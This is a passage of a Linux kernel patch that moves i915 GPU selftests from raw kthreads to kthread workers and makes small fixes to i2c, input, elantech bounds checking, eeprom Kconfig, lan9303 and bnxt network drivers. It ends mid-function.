+@@ -913,16 +916,17 @@ static int active_engine(void *data)
+ 	for (count = 0; count < ARRAY_SIZE(ce); count++) {
+ 		ce[count] = intel_context_create(engine);
+ 		if (IS_ERR(ce[count])) {
+-			err = PTR_ERR(ce[count]);
+-			pr_err("[%s] Create context #%ld failed: %d!\n", engine->name, count, err);
++			arg->result = PTR_ERR(ce[count]);
++			pr_err("[%s] Create context #%ld failed: %d!\n",
++			       engine->name, count, arg->result);
+ 			while (--count)
+ 				intel_context_put(ce[count]);
+-			return err;
++			return;
+ 		}
+ 	}
+ 
+ 	count = 0;
+-	while (!kthread_should_stop()) {
++	while (!READ_ONCE(arg->stop)) {
+ 		unsigned int idx = count++ & (ARRAY_SIZE(rq) - 1);
+ 		struct i915_request *old = rq[idx];
+ 		struct i915_request *new;
+@@ -967,7 +971,7 @@ static int active_engine(void *data)
+ 		intel_context_put(ce[count]);
+ 	}
+ 
+-	return err;
++	arg->result = err;
+ }
+ 
+ static int __igt_reset_engines(struct intel_gt *gt,
+@@ -1022,7 +1026,7 @@ static int __igt_reset_engines(struct intel_gt *gt,
+ 
+ 		memset(threads, 0, sizeof(*threads) * I915_NUM_ENGINES);
+ 		for_each_engine(other, gt, tmp) {
+-			struct task_struct *tsk;
++			struct kthread_worker *worker;
+ 
+ 			threads[tmp].resets =
+ 				i915_reset_engine_count(global, other);
+@@ -1036,19 +1040,21 @@ static int __igt_reset_engines(struct intel_gt *gt,
+ 			threads[tmp].engine = other;
+ 			threads[tmp].flags = flags;
+ 
+-			tsk = kthread_run(active_engine, &threads[tmp],
+-					  "igt/%s", other->name);
+-			if (IS_ERR(tsk)) {
+-				err = PTR_ERR(tsk);
+-				pr_err("[%s] Thread spawn failed: %d!\n", engine->name, err);
++			worker = kthread_create_worker(0, "igt/%s",
++						       other->name);
++			if (IS_ERR(worker)) {
++				err = PTR_ERR(worker);
++				pr_err("[%s] Worker create failed: %d!\n",
++				       engine->name, err);
+ 				goto unwind;
+ 			}
+ 
+-			threads[tmp].task = tsk;
+-			get_task_struct(tsk);
+-		}
++			threads[tmp].worker = worker;
+ 
+-		yield(); /* start all threads before we begin */
++			kthread_init_work(&threads[tmp].work, active_engine);
++			kthread_queue_work(threads[tmp].worker,
++					   &threads[tmp].work);
++		}
+ 
+ 		st_engine_heartbeat_disable_no_pm(engine);
+ 		GEM_BUG_ON(test_and_set_bit(I915_RESET_ENGINE + id,
+@@ -1197,17 +1203,20 @@ unwind:
+ 		for_each_engine(other, gt, tmp) {
+ 			int ret;
+ 
+-			if (!threads[tmp].task)
++			if (!threads[tmp].worker)
+ 				continue;
+ 
+-			ret = kthread_stop(threads[tmp].task);
++			WRITE_ONCE(threads[tmp].stop, true);
++			kthread_flush_work(&threads[tmp].work);
++			ret = READ_ONCE(threads[tmp].result);
+ 			if (ret) {
+ 				pr_err("kthread for other engine %s failed, err=%d\n",
+ 				       other->name, ret);
+ 				if (!err)
+ 					err = ret;
+ 			}
+-			put_task_struct(threads[tmp].task);
++
++			kthread_destroy_worker(threads[tmp].worker);
+ 
+ 			/* GuC based resets are not logged per engine */
+ 			if (!using_guc) {
+diff --git a/drivers/gpu/drm/i915/selftests/i915_request.c b/drivers/gpu/drm/i915/selftests/i915_request.c
+index 818a4909c1f35..a46350c37e9d4 100644
+--- a/drivers/gpu/drm/i915/selftests/i915_request.c
++++ b/drivers/gpu/drm/i915/selftests/i915_request.c
+@@ -299,9 +299,18 @@ __live_request_alloc(struct intel_context *ce)
+ 	return intel_context_create_request(ce);
+ }
+ 
+-static int __igt_breadcrumbs_smoketest(void *arg)
++struct smoke_thread {
++	struct kthread_worker *worker;
++	struct kthread_work work;
++	struct smoketest *t;
++	bool stop;
++	int result;
++};
++
++static void __igt_breadcrumbs_smoketest(struct kthread_work *work)
+ {
+-	struct smoketest *t = arg;
++	struct smoke_thread *thread = container_of(work, typeof(*thread), work);
++	struct smoketest *t = thread->t;
+ 	const unsigned int max_batch = min(t->ncontexts, t->max_batch) - 1;
+ 	const unsigned int total = 4 * t->ncontexts + 1;
+ 	unsigned int num_waits = 0, num_fences = 0;
+@@ -320,8 +329,10 @@ static int __igt_breadcrumbs_smoketest(void *arg)
+ 	 */
+ 
+ 	requests = kcalloc(total, sizeof(*requests), GFP_KERNEL);
+-	if (!requests)
+-		return -ENOMEM;
++	if (!requests) {
++		thread->result = -ENOMEM;
++		return;
++	}
+ 
+ 	order = i915_random_order(total, &prng);
+ 	if (!order) {
+@@ -329,7 +340,7 @@ static int __igt_breadcrumbs_smoketest(void *arg)
+ 		goto out_requests;
+ 	}
+ 
+-	while (!kthread_should_stop()) {
++	while (!READ_ONCE(thread->stop)) {
+ 		struct i915_sw_fence *submit, *wait;
+ 		unsigned int n, count;
+ 
+@@ -437,7 +448,7 @@ static int __igt_breadcrumbs_smoketest(void *arg)
+ 	kfree(order);
+ out_requests:
+ 	kfree(requests);
+-	return err;
++	thread->result = err;
+ }
+ 
+ static int mock_breadcrumbs_smoketest(void *arg)
+@@ -450,7 +461,7 @@ static int mock_breadcrumbs_smoketest(void *arg)
+ 		.request_alloc = __mock_request_alloc
+ 	};
+ 	unsigned int ncpus = num_online_cpus();
+-	struct task_struct **threads;
++	struct smoke_thread *threads;
+ 	unsigned int n;
+ 	int ret = 0;
+ 
+@@ -479,28 +490,37 @@ static int mock_breadcrumbs_smoketest(void *arg)
+ 	}
+ 
+ 	for (n = 0; n < ncpus; n++) {
+-		threads[n] = kthread_run(__igt_breadcrumbs_smoketest,
+-					 &t, "igt/%d", n);
+-		if (IS_ERR(threads[n])) {
+-			ret = PTR_ERR(threads[n]);
++		struct kthread_worker *worker;
++
++		worker = kthread_create_worker(0, "igt/%d", n);
++		if (IS_ERR(worker)) {
++			ret = PTR_ERR(worker);
+ 			ncpus = n;
+ 			break;
+ 		}
+ 
+-		get_task_struct(threads[n]);
++		threads[n].worker = worker;
++		threads[n].t = &t;
++		threads[n].stop = false;
++		threads[n].result = 0;
++
++		kthread_init_work(&threads[n].work,
++				  __igt_breadcrumbs_smoketest);
++		kthread_queue_work(worker, &threads[n].work);
+ 	}
+ 
+-	yield(); /* start all threads before we begin */
+ 	msleep(jiffies_to_msecs(i915_selftest.timeout_jiffies));
+ 
+ 	for (n = 0; n < ncpus; n++) {
+ 		int err;
+ 
+-		err = kthread_stop(threads[n]);
++		WRITE_ONCE(threads[n].stop, true);
++		kthread_flush_work(&threads[n].work);
++		err = READ_ONCE(threads[n].result);
+ 		if (err < 0 && !ret)
+ 			ret = err;
+ 
+-		put_task_struct(threads[n]);
++		kthread_destroy_worker(threads[n].worker);
+ 	}
+ 	pr_info("Completed %lu waits for %lu fence across %d cpus\n",
+ 		atomic_long_read(&t.num_waits),
+@@ -1419,9 +1439,18 @@ out_free:
+ 	return err;
+ }
+ 
+-static int __live_parallel_engine1(void *arg)
++struct parallel_thread {
++	struct kthread_worker *worker;
++	struct kthread_work work;
++	struct intel_engine_cs *engine;
++	int result;
++};
++
++static void __live_parallel_engine1(struct kthread_work *work)
+ {
+-	struct intel_engine_cs *engine = arg;
++	struct parallel_thread *thread =
++		container_of(work, typeof(*thread), work);
++	struct intel_engine_cs *engine = thread->engine;
+ 	IGT_TIMEOUT(end_time);
+ 	unsigned long count;
+ 	int err = 0;
+@@ -1452,12 +1481,14 @@ static int __live_parallel_engine1(void *arg)
+ 	intel_engine_pm_put(engine);
+ 
+ 	pr_info("%s: %lu request + sync\n", engine->name, count);
+-	return err;
++	thread->result = err;
+ }
+ 
+-static int __live_parallel_engineN(void *arg)
++static void __live_parallel_engineN(struct kthread_work *work)
+ {
+-	struct intel_engine_cs *engine = arg;
++	struct parallel_thread *thread =
++		container_of(work, typeof(*thread), work);
++	struct intel_engine_cs *engine = thread->engine;
+ 	IGT_TIMEOUT(end_time);
+ 	unsigned long count;
+ 	int err = 0;
+@@ -1479,7 +1510,7 @@ static int __live_parallel_engineN(void *arg)
+ 	intel_engine_pm_put(engine);
+ 
+ 	pr_info("%s: %lu requests\n", engine->name, count);
+-	return err;
++	thread->result = err;
+ }
+ 
+ static bool wake_all(struct drm_i915_private *i915)
+@@ -1505,9 +1536,11 @@ static int wait_for_all(struct drm_i915_private *i915)
+ 	return -ETIME;
+ }
+ 
+-static int __live_parallel_spin(void *arg)
++static void __live_parallel_spin(struct kthread_work *work)
+ {
+-	struct intel_engine_cs *engine = arg;
++	struct parallel_thread *thread =
++		container_of(work, typeof(*thread), work);
++	struct intel_engine_cs *engine = thread->engine;
+ 	struct igt_spinner spin;
+ 	struct i915_request *rq;
+ 	int err = 0;
+@@ -1520,7 +1553,8 @@ static int __live_parallel_spin(void *arg)
+ 
+ 	if (igt_spinner_init(&spin, engine->gt)) {
+ 		wake_all(engine->i915);
+-		return -ENOMEM;
++		thread->result = -ENOMEM;
++		return;
+ 	}
+ 
+ 	intel_engine_pm_get(engine);
+@@ -1553,22 +1587,22 @@ static int __live_parallel_spin(void *arg)
+ 
+ out_spin:
+ 	igt_spinner_fini(&spin);
+-	return err;
++	thread->result = err;
+ }
+ 
+ static int live_parallel_engines(void *arg)
+ {
+ 	struct drm_i915_private *i915 = arg;
+-	static int (* const func[])(void *arg) = {
++	static void (* const func[])(struct kthread_work *) = {
+ 		__live_parallel_engine1,
+ 		__live_parallel_engineN,
+ 		__live_parallel_spin,
+ 		NULL,
+ 	};
+ 	const unsigned int nengines = num_uabi_engines(i915);
++	struct parallel_thread *threads;
+ 	struct intel_engine_cs *engine;
+-	int (* const *fn)(void *arg);
+-	struct task_struct **tsk;
++	void (* const *fn)(struct kthread_work *);
+ 	int err = 0;
+ 
+ 	/*
+@@ -1576,8 +1610,8 @@ static int live_parallel_engines(void *arg)
+ 	 * tests that we load up the system maximally.
+ 	 */
+ 
+-	tsk = kcalloc(nengines, sizeof(*tsk), GFP_KERNEL);
+-	if (!tsk)
++	threads = kcalloc(nengines, sizeof(*threads), GFP_KERNEL);
++	if (!threads)
+ 		return -ENOMEM;
+ 
+ 	for (fn = func; !err && *fn; fn++) {
+@@ -1594,37 +1628,44 @@ static int live_parallel_engines(void *arg)
+ 
+ 		idx = 0;
+ 		for_each_uabi_engine(engine, i915) {
+-			tsk[idx] = kthread_run(*fn, engine,
+-					       "igt/parallel:%s",
+-					       engine->name);
+-			if (IS_ERR(tsk[idx])) {
+-				err = PTR_ERR(tsk[idx]);
++			struct kthread_worker *worker;
++
++			worker = kthread_create_worker(0, "igt/parallel:%s",
++						       engine->name);
++			if (IS_ERR(worker)) {
++				err = PTR_ERR(worker);
+ 				break;
+ 			}
+-			get_task_struct(tsk[idx++]);
+-		}
+ 
+-		yield(); /* start all threads before we kthread_stop() */
++			threads[idx].worker = worker;
++			threads[idx].result = 0;
++			threads[idx].engine = engine;
++
++			kthread_init_work(&threads[idx].work, *fn);
++			kthread_queue_work(worker, &threads[idx].work);
++			idx++;
++		}
+ 
+ 		idx = 0;
+ 		for_each_uabi_engine(engine, i915) {
+ 			int status;
+ 
+-			if (IS_ERR(tsk[idx]))
++			if (!threads[idx].worker)
+ 				break;
+ 
+-			status = kthread_stop(tsk[idx]);
++			kthread_flush_work(&threads[idx].work);
++			status = READ_ONCE(threads[idx].result);
+ 			if (status && !err)
+ 				err = status;
+ 
+-			put_task_struct(tsk[idx++]);
++			kthread_destroy_worker(threads[idx++].worker);
+ 		}
+ 
+ 		if (igt_live_test_end(&t))
+ 			err = -EIO;
+ 	}
+ 
+-	kfree(tsk);
++	kfree(threads);
+ 	return err;
+ }
+ 
+@@ -1672,7 +1713,7 @@ static int live_breadcrumbs_smoketest(void *arg)
+ 	const unsigned int ncpus = num_online_cpus();
+ 	unsigned long num_waits, num_fences;
+ 	struct intel_engine_cs *engine;
+-	struct task_struct **threads;
++	struct smoke_thread *threads;
+ 	struct igt_live_test live;
+ 	intel_wakeref_t wakeref;
+ 	struct smoketest *smoke;
+@@ -1746,23 +1787,26 @@ static int live_breadcrumbs_smoketest(void *arg)
+ 			 smoke[idx].max_batch, engine->name);
+ 
+ 		for (n = 0; n < ncpus; n++) {
+-			struct task_struct *tsk;
++			unsigned int i = idx * ncpus + n;
++			struct kthread_worker *worker;
+ 
+-			tsk = kthread_run(__igt_breadcrumbs_smoketest,
+-					  &smoke[idx], "igt/%d.%d", idx, n);
+-			if (IS_ERR(tsk)) {
+-				ret = PTR_ERR(tsk);
++			worker = kthread_create_worker(0, "igt/%d.%d", idx, n);
++			if (IS_ERR(worker)) {
++				ret = PTR_ERR(worker);
+ 				goto out_flush;
+ 			}
+ 
+-			get_task_struct(tsk);
+-			threads[idx * ncpus + n] = tsk;
++			threads[i].worker = worker;
++			threads[i].t = &smoke[idx];
++
++			kthread_init_work(&threads[i].work,
++					  __igt_breadcrumbs_smoketest);
++			kthread_queue_work(worker, &threads[i].work);
+ 		}
+ 
+ 		idx++;
+ 	}
+ 
+-	yield(); /* start all threads before we begin */
+ 	msleep(jiffies_to_msecs(i915_selftest.timeout_jiffies));
+ 
+ out_flush:
+@@ -1771,17 +1815,19 @@ out_flush:
+ 	num_fences = 0;
+ 	for_each_uabi_engine(engine, i915) {
+ 		for (n = 0; n < ncpus; n++) {
+-			struct task_struct *tsk = threads[idx * ncpus + n];
++			unsigned int i = idx * ncpus + n;
+ 			int err;
+ 
+-			if (!tsk)
++			if (!threads[i].worker)
+ 				continue;
+ 
+-			err = kthread_stop(tsk);
++			WRITE_ONCE(threads[i].stop, true);
++			kthread_flush_work(&threads[i].work);
++			err = READ_ONCE(threads[i].result);
+ 			if (err < 0 && !ret)
+ 				ret = err;
+ 
+-			put_task_struct(tsk);
++			kthread_destroy_worker(threads[i].worker);
+ 		}
+ 
+ 		num_waits += atomic_long_read(&smoke[idx].num_waits);
+@@ -2891,9 +2937,18 @@ out:
+ 	return err;
+ }
+ 
+-static int p_sync0(void *arg)
++struct p_thread {
++	struct perf_stats p;
++	struct kthread_worker *worker;
++	struct kthread_work work;
++	struct intel_engine_cs *engine;
++	int result;
++};
++
++static void p_sync0(struct kthread_work *work)
+ {
+-	struct perf_stats *p = arg;
++	struct p_thread *thread = container_of(work, typeof(*thread), work);
++	struct perf_stats *p = &thread->p;
+ 	struct intel_engine_cs *engine = p->engine;
+ 	struct intel_context *ce;
+ 	IGT_TIMEOUT(end_time);
+@@ -2902,13 +2957,16 @@ static int p_sync0(void *arg)
+ 	int err = 0;
+ 
+ 	ce = intel_context_create(engine);
+-	if (IS_ERR(ce))
+-		return PTR_ERR(ce);
++	if (IS_ERR(ce)) {
++		thread->result = PTR_ERR(ce);
++		return;
++	}
+ 
+ 	err = intel_context_pin(ce);
+ 	if (err) {
+ 		intel_context_put(ce);
+-		return err;
++		thread->result = err;
++		return;
+ 	}
+ 
+ 	if (intel_engine_supports_stats(engine)) {
+@@ -2958,12 +3016,13 @@ static int p_sync0(void *arg)
+ 
+ 	intel_context_unpin(ce);
+ 	intel_context_put(ce);
+-	return err;
++	thread->result = err;
+ }
+ 
+-static int p_sync1(void *arg)
++static void p_sync1(struct kthread_work *work)
+ {
+-	struct perf_stats *p = arg;
++	struct p_thread *thread = container_of(work, typeof(*thread), work);
++	struct perf_stats *p = &thread->p;
+ 	struct intel_engine_cs *engine = p->engine;
+ 	struct i915_request *prev = NULL;
+ 	struct intel_context *ce;
+@@ -2973,13 +3032,16 @@ static int p_sync1(void *arg)
+ 	int err = 0;
+ 
+ 	ce = intel_context_create(engine);
+-	if (IS_ERR(ce))
+-		return PTR_ERR(ce);
++	if (IS_ERR(ce)) {
++		thread->result = PTR_ERR(ce);
++		return;
++	}
+ 
+ 	err = intel_context_pin(ce);
+ 	if (err) {
+ 		intel_context_put(ce);
+-		return err;
++		thread->result = err;
++		return;
+ 	}
+ 
+ 	if (intel_engine_supports_stats(engine)) {
+@@ -3031,12 +3093,13 @@ static int p_sync1(void *arg)
+ 
+ 	intel_context_unpin(ce);
+ 	intel_context_put(ce);
+-	return err;
++	thread->result = err;
+ }
+ 
+-static int p_many(void *arg)
++static void p_many(struct kthread_work *work)
+ {
+-	struct perf_stats *p = arg;
++	struct p_thread *thread = container_of(work, typeof(*thread), work);
++	struct perf_stats *p = &thread->p;
+ 	struct intel_engine_cs *engine = p->engine;
+ 	struct intel_context *ce;
+ 	IGT_TIMEOUT(end_time);
+@@ -3045,13 +3108,16 @@ static int p_many(void *arg)
+ 	bool busy;
+ 
+ 	ce = intel_context_create(engine);
+-	if (IS_ERR(ce))
+-		return PTR_ERR(ce);
++	if (IS_ERR(ce)) {
++		thread->result = PTR_ERR(ce);
++		return;
++	}
+ 
+ 	err = intel_context_pin(ce);
+ 	if (err) {
+ 		intel_context_put(ce);
+-		return err;
++		thread->result = err;
++		return;
+ 	}
+ 
+ 	if (intel_engine_supports_stats(engine)) {
+@@ -3092,26 +3158,23 @@ static int p_many(void *arg)
+ 
+ 	intel_context_unpin(ce);
+ 	intel_context_put(ce);
+-	return err;
++	thread->result = err;
+ }
+ 
+ static int perf_parallel_engines(void *arg)
+ {
+ 	struct drm_i915_private *i915 = arg;
+-	static int (* const func[])(void *arg) = {
++	static void (* const func[])(struct kthread_work *) = {
+ 		p_sync0,
+ 		p_sync1,
+ 		p_many,
+ 		NULL,
+ 	};
+ 	const unsigned int nengines = num_uabi_engines(i915);
++	void (* const *fn)(struct kthread_work *);
+ 	struct intel_engine_cs *engine;
+-	int (* const *fn)(void *arg);
+ 	struct pm_qos_request qos;
+-	struct {
+-		struct perf_stats p;
+-		struct task_struct *tsk;
+-	} *engines;
++	struct p_thread *engines;
+ 	int err = 0;
+ 
+ 	engines = kcalloc(nengines, sizeof(*engines), GFP_KERNEL);
+@@ -3134,36 +3197,45 @@ static int perf_parallel_engines(void *arg)
+ 
+ 		idx = 0;
+ 		for_each_uabi_engine(engine, i915) {
++			struct kthread_worker *worker;
++
+ 			intel_engine_pm_get(engine);
+ 
+ 			memset(&engines[idx].p, 0, sizeof(engines[idx].p));
+-			engines[idx].p.engine = engine;
+ 
+-			engines[idx].tsk = kthread_run(*fn, &engines[idx].p,
+-						       "igt:%s", engine->name);
+-			if (IS_ERR(engines[idx].tsk)) {
+-				err = PTR_ERR(engines[idx].tsk);
++			worker = kthread_create_worker(0, "igt:%s",
++						       engine->name);
++			if (IS_ERR(worker)) {
++				err = PTR_ERR(worker);
+ 				intel_engine_pm_put(engine);
+ 				break;
+ 			}
+-			get_task_struct(engines[idx++].tsk);
+-		}
++			engines[idx].worker = worker;
++			engines[idx].result = 0;
++			engines[idx].p.engine = engine;
++			engines[idx].engine = engine;
+ 
+-		yield(); /* start all threads before we kthread_stop() */
++			kthread_init_work(&engines[idx].work, *fn);
++			kthread_queue_work(worker, &engines[idx].work);
++			idx++;
++		}
+ 
+ 		idx = 0;
+ 		for_each_uabi_engine(engine, i915) {
+ 			int status;
+ 
+-			if (IS_ERR(engines[idx].tsk))
++			if (!engines[idx].worker)
+ 				break;
+ 
+-			status = kthread_stop(engines[idx].tsk);
++			kthread_flush_work(&engines[idx].work);
++			status = READ_ONCE(engines[idx].result);
+ 			if (status && !err)
+ 				err = status;
+ 
+ 			intel_engine_pm_put(engine);
+-			put_task_struct(engines[idx++].tsk);
++
++			kthread_destroy_worker(engines[idx].worker);
++			idx++;
+ 		}
+ 
+ 		if (igt_live_test_end(&t))
+diff --git a/drivers/i2c/busses/i2c-mv64xxx.c b/drivers/i2c/busses/i2c-mv64xxx.c
+index 047dfef7a6577..878c076ebdc6b 100644
+--- a/drivers/i2c/busses/i2c-mv64xxx.c
++++ b/drivers/i2c/busses/i2c-mv64xxx.c
+@@ -520,6 +520,17 @@ mv64xxx_i2c_intr(int irq, void *dev_id)
+ 
+ 	while (readl(drv_data->reg_base + drv_data->reg_offsets.control) &
+ 						MV64XXX_I2C_REG_CONTROL_IFLG) {
++		/*
++		 * It seems that sometime the controller updates the status
++		 * register only after it asserts IFLG in control register.
++		 * This may result in weird bugs when in atomic mode. A delay
++		 * of 100 ns before reading the status register solves this
++		 * issue. This bug does not seem to appear when using
++		 * interrupts.
++		 */
++		if (drv_data->atomic)
++			ndelay(100);
++
+ 		status = readl(drv_data->reg_base + drv_data->reg_offsets.status);
+ 		mv64xxx_i2c_fsm(drv_data, status);
+ 		mv64xxx_i2c_do_action(drv_data);
+diff --git a/drivers/i2c/busses/i2c-sprd.c b/drivers/i2c/busses/i2c-sprd.c
+index 4fe15cd78907e..ffc54fbf814dd 100644
+--- a/drivers/i2c/busses/i2c-sprd.c
++++ b/drivers/i2c/busses/i2c-sprd.c
+@@ -576,12 +576,14 @@ static int sprd_i2c_remove(struct platform_device *pdev)
+ 	struct sprd_i2c *i2c_dev = platform_get_drvdata(pdev);
+ 	int ret;
+ 
+-	ret = pm_runtime_resume_and_get(i2c_dev->dev);
++	ret = pm_runtime_get_sync(i2c_dev->dev);
+ 	if (ret < 0)
+-		return ret;
++		dev_err(&pdev->dev, "Failed to resume device (%pe)\n", ERR_PTR(ret));
+ 
+ 	i2c_del_adapter(&i2c_dev->adap);
+-	clk_disable_unprepare(i2c_dev->clk);
++
++	if (ret >= 0)
++		clk_disable_unprepare(i2c_dev->clk);
+ 
+ 	pm_runtime_put_noidle(i2c_dev->dev);
+ 	pm_runtime_disable(i2c_dev->dev);
+diff --git a/drivers/input/input.c b/drivers/input/input.c
+index ebb2b7f0f8ff4..8b6a922f84702 100644
+--- a/drivers/input/input.c
++++ b/drivers/input/input.c
+@@ -701,7 +701,7 @@ void input_close_device(struct input_handle *handle)
+ 
+ 	__input_release_device(handle);
+ 
+-	if (!dev->inhibited && !--dev->users) {
++	if (!--dev->users && !dev->inhibited) {
+ 		if (dev->poller)
+ 			input_dev_poller_stop(dev->poller);
+ 		if (dev->close)
+diff --git a/drivers/input/joystick/xpad.c b/drivers/input/joystick/xpad.c
+index cd36cf7165423..76cbcca13c9e9 100644
+--- a/drivers/input/joystick/xpad.c
++++ b/drivers/input/joystick/xpad.c
+@@ -282,7 +282,6 @@ static const struct xpad_device {
+ 	{ 0x1430, 0xf801, "RedOctane Controller", 0, XTYPE_XBOX360 },
+ 	{ 0x146b, 0x0601, "BigBen Interactive XBOX 360 Controller", 0, XTYPE_XBOX360 },
+ 	{ 0x146b, 0x0604, "Bigben Interactive DAIJA Arcade Stick", MAP_TRIGGERS_TO_BUTTONS, XTYPE_XBOX360 },
+-	{ 0x1532, 0x0037, "Razer Sabertooth", 0, XTYPE_XBOX360 },
+ 	{ 0x1532, 0x0a00, "Razer Atrox Arcade Stick", MAP_TRIGGERS_TO_BUTTONS, XTYPE_XBOXONE },
+ 	{ 0x1532, 0x0a03, "Razer Wildcat", 0, XTYPE_XBOXONE },
+ 	{ 0x15e4, 0x3f00, "Power A Mini Pro Elite", 0, XTYPE_XBOX360 },
+diff --git a/drivers/input/mouse/elantech.c b/drivers/input/mouse/elantech.c
+index ece97f8c6a3e3..2118b2075f437 100644
+--- a/drivers/input/mouse/elantech.c
++++ b/drivers/input/mouse/elantech.c
+@@ -674,10 +674,11 @@ static void process_packet_head_v4(struct psmouse *psmouse)
+ 	struct input_dev *dev = psmouse->dev;
+ 	struct elantech_data *etd = psmouse->private;
+ 	unsigned char *packet = psmouse->packet;
+-	int id = ((packet[3] & 0xe0) >> 5) - 1;
++	int id;
+ 	int pres, traces;
+ 
+-	if (id < 0)
++	id = ((packet[3] & 0xe0) >> 5) - 1;
++	if (id < 0 || id >= ETP_MAX_FINGERS)
+ 		return;
+ 
+ 	etd->mt[id].x = ((packet[1] & 0x0f) << 8) | packet[2];
+@@ -707,7 +708,7 @@ static void process_packet_motion_v4(struct psmouse *psmouse)
+ 	int id, sid;
+ 
+ 	id = ((packet[0] & 0xe0) >> 5) - 1;
+-	if (id < 0)
++	if (id < 0 || id >= ETP_MAX_FINGERS)
+ 		return;
+ 
+ 	sid = ((packet[3] & 0xe0) >> 5) - 1;
+@@ -728,7 +729,7 @@ static void process_packet_motion_v4(struct psmouse *psmouse)
+ 	input_report_abs(dev, ABS_MT_POSITION_X, etd->mt[id].x);
+ 	input_report_abs(dev, ABS_MT_POSITION_Y, etd->mt[id].y);
+ 
+-	if (sid >= 0) {
++	if (sid >= 0 && sid < ETP_MAX_FINGERS) {
+ 		etd->mt[sid].x += delta_x2 * weight;
+ 		etd->mt[sid].y -= delta_y2 * weight;
+ 		input_mt_slot(dev, sid);
+diff --git a/drivers/misc/eeprom/Kconfig b/drivers/misc/eeprom/Kconfig
+index f0a7531f354c1..2d240bfa819f8 100644
+--- a/drivers/misc/eeprom/Kconfig
++++ b/drivers/misc/eeprom/Kconfig
+@@ -6,6 +6,7 @@ config EEPROM_AT24
+ 	depends on I2C && SYSFS
+ 	select NVMEM
+ 	select NVMEM_SYSFS
++	select REGMAP
+ 	select REGMAP_I2C
+ 	help
+ 	  Enable this driver to get read/write support to most I2C EEPROMs
+diff --git a/drivers/net/dsa/lan9303-core.c b/drivers/net/dsa/lan9303-core.c
+index 2e270b4791432..a08e7cbb23c91 100644
+--- a/drivers/net/dsa/lan9303-core.c
++++ b/drivers/net/dsa/lan9303-core.c
+@@ -1199,8 +1199,6 @@ static int lan9303_port_fdb_add(struct dsa_switch *ds, int port,
+ 	struct lan9303 *chip = ds->priv;
+ 
+ 	dev_dbg(chip->dev, "%s(%d, %pM, %d)\n", __func__, port, addr, vid);
+-	if (vid)
+-		return -EOPNOTSUPP;
+ 
+ 	return lan9303_alr_add_port(chip, addr, port, false);
+ }
+@@ -1212,8 +1210,6 @@ static int lan9303_port_fdb_del(struct dsa_switch *ds, int port,
+ 	struct lan9303 *chip = ds->priv;
+ 
+ 	dev_dbg(chip->dev, "%s(%d, %pM, %d)\n", __func__, port, addr, vid);
+-	if (vid)
+-		return -EOPNOTSUPP;
+ 	lan9303_alr_del_port(chip, addr, port);
+ 
+ 	return 0;
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index e3e5a427222f6..6469fb8a42a89 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -2389,6 +2389,9 @@ static int bnxt_async_event_process(struct bnxt *bp,
+ 				struct bnxt_ptp_cfg *ptp = bp->ptp_cfg;
+ 				u64 ns;
+ 
++				if (!ptp)
++					goto async_event_process_exit;
++
+ 				spin_lock_bh(&ptp->ptp_lock);
+ 				bnxt_ptp_update_current_time(bp);
+ 				ns = (((u64)BNXT_EVENT_PHC_RTC_UPDATE(data1) <<
+@@ -4787,6 +4790,9 @@ int bnxt_hwrm_func_drv_rgtr(struct bnxt *bp, unsigned long *bmap, int bmap_size,
+ 		if (event_id == ASYNC_EVENT_CMPL_EVENT_ID_ERROR_RECOVERY &&
+ 		    !(bp->fw_cap & BNXT_FW_CAP_ERROR_RECOVERY))
+ 			continue;
++		if (event_id == ASYNC_EVENT_CMPL_EVENT_ID_PHC_UPDATE &&
++		    !bp->ptp_cfg)
++			continue;
+ 		__set_bit(bnxt_async_events_arr[i], async_events_bmap);
+ 	}
+ 	if (bmap && bmap_size) {
+@@ -8808,6 +8814,9 @@ static int bnxt_init_chip(struct bnxt *bp, bool irq_re_init)
+ 		goto err_out;
+ 	}
+ 
++	if (BNXT_VF(bp))
++		bnxt_hwrm_func_qcfg(bp);
++
+ 	rc = bnxt_setup_vnic(bp, 0);
+ 	if (rc)
+ 		goto err_out;
+@@ -11573,6 +11582,7 @@ static void bnxt_tx_timeout(struct net_device *dev, unsigned int txqueue)
+ static void bnxt_fw_health_check(struct bnxt *bp)
+ {
+ 	struct bnxt_fw_health *fw_health = bp->fw_health;
++	struct pci_dev *pdev = bp->pdev;
+ 	u32 val;
+ 
+ 	if (!fw_health->enabled || test_bit(BNXT_STATE_IN_FW_RESET, &bp->state))
+@@ -11586,7 +11596,7 @@ static void bnxt_fw_health_check(struct bnxt *bp)
+ 	}
+ 
+ 	val = bnxt_fw_health_readl(bp, BNXT_FW_HEARTBEAT_REG);
+-	if (val == fw_health->last_fw_heartbeat) {
++	if (val == fw_health->last_fw_heartbeat && pci_device_is_present(pdev)) {
+ 		fw_health->arrests++;
+ 		goto fw_reset;
+ 	}
+@@ -11594,7 +11604,7 @@ static void bnxt_fw_health_check(struct bnxt *bp)
+ 	fw_health->last_fw_heartbeat = val;
+ 
+ 	val = bnxt_fw_health_readl(bp, BNXT_FW_RESET_CNT_REG);
+-	if (val != fw_health->last_fw_reset_cnt) {
++	if (val != fw_health->last_fw_reset_cnt && pci_device_is_present(pdev)) {
+ 		fw_health->discoveries++;
+ 		goto fw_reset;
+ 	}
+@@ -12998,26 +13008,37 @@ static void bnxt_cfg_ntp_filters(struct bnxt *bp)
+ 
+ #endif /* CONFIG_RFS_ACCEL */
+ 
+-static int bnxt_udp_tunnel_sync(struct net_device *netdev, unsigned int table)
++static int bnxt_udp_tunnel_set_port(struct net_device *netdev, unsigned int table,
++				    unsigned int entry, struct udp_tunnel_info *ti)
+ {
+ 	struct bnxt *bp = netdev_priv(netdev);
+-	struct udp_tunnel_info ti;
+ 	unsigned int cmd;
+ 
+-	udp_tunnel_nic_get_port(netdev, table, 0, &ti);
+-	if (ti.type == UDP_TUNNEL_TYPE_VXLAN)
++	if (ti->type == UDP_TUNNEL_TYPE_VXLAN)
+ 		cmd = TUNNEL_DST_PORT_FREE_REQ_TUNNEL_TYPE_VXLAN;
+ 	else
+ 		cmd = TUNNEL_DST_PORT_FREE_REQ_TUNNEL_TYPE_GENEVE;
+ 
+-	if (ti.port)
+-		return bnxt_hwrm_tunnel_dst_port_alloc(bp, ti.port, cmd);
++	return bnxt_hwrm_tunnel_dst_port_alloc(bp, ti->port, cmd);
++}
++
++static int bnxt_udp_tunnel_unset_port(struct net_device *netdev, unsigned int table,
